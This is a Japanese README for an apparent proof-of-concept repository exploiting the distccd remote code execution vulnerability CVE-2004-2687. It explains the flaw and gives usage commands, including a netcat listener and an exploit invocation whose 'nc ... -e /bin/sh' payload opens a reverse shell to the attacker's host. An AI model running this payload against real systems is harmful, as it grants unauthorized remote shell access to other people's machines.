
Pythonベースの概念実証エクスプロイト。distccdのCVE-2004-2687リモートコード実行脆弱性を対象とし、脆弱なサーバ上で認証不要のシェルアクセスを可能にします。
🖥️ -h3x0v3rl0rd- 1️⃣ CVE-2004-2687 2️⃣ Python3 にアップグレード
概要
このリポジトリには、CVE-2004-2687 として識別される distccd 脆弱性の Proof of Concept (PoC) エクスプロイトが含まれています。この脆弱性は、distcc 分散 C/C++ コンパイルシステムの一部である distccd デーモンに存在します。適切に設定されていない場合、distccd はリモート攻撃者が認証なしでサーバー上で任意のコマンドを実行することを可能にします。
脆弱性の詳細
distcc は、ビルドプロセスを高速化するために、複数のマシンにコンパイルタスクを分散するように設計されています。しかし、distccd デーモンが適切に保護されていない場合、リモートコード実行 (RCE) 脆弱性を露呈します。これは、デーモンがネットワークポートで待機し、任意のクライアントからのコマンドを受け入れ、デーモンを実行しているユーザーとしてサーバー上でシェルコマンドを実行できるようにするためです。
この脆弱性は CVE-2004-2687 として割り当てられ、バージョン 3.1 より前の distccd に影響します。悪用されると、攻撃者は脆弱なマシンへのシェルアクセスを取得し、システム全体が侵害される可能性があります。
nc -lvp 4444
python3 distccd_rce.py -t [rhost] -p 3632 -c "nc [localhost] [lport] -e /bin/sh"
脆弱性 :

エクスプロイト :
